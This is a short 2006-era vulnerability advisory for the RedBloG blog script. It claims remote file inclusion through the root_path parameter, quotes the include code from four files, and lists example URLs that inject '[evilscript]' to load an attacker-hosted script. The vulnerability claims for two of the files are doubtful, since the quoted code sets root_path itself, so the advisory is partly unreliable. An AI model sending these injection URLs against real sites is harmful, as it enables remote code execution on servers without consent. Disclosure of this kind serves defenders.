###########################################

RedBloG 0.x Multiple Remote File Include#

Discovered: KeyCoder

HomePage : http://keycoder.blogspot.com#

Contact: keycoder[at]msn[dot]com

Greetz: SecretlyX-BeLa-BodyGuarD

###########################################

Details :

RedBloG 0.x Multiple (root_path) Remote File Include Vulnerability

Script : http://sourceforge.net/projects/redblog

Vulnerable Files: /admin/index.php,/admin/config.php,imgen.php,common.php

Risk:High

Class:Remote

---

#Vulnerable Files Detail:

/admin/index.php

define('REDBLOG', true);
$root_path='./…/';
require_once($root_path . 'common.php');
require_once($root_path . 'includes/functions.php');

/admin/config.php

define('REDBLOG', true);
$root_path='./…/';
require_once($root_path . 'common.php');
require_once($root_path . 'includes/functions.php');

/imgen.php

define('REDBLOG', true);
define('IMGEN', true);
$root_path='./';
require_once($root_path . 'common.php');

/common.php

require_once($root_path . 'config.php');
require_once($root_path . 'includes/constants.php');
require_once($root_path . 'includes/template.php');
require_once($root_path . 'includes/db.php');

##########################################
Examples:
##########################################
http://host/Path/admin/index.php?root_path=[evilscript]
http://host/Path/admin/config.php?root_path=[evilscript]
http://host/Path/imgen.php?root_path=[evilscript]
http://host/Path/common.php?root_path=[evilscript]

#Original advisory: http://keycoder.blogspot.com/2006/09/redblog-05-multiple-remote-file.html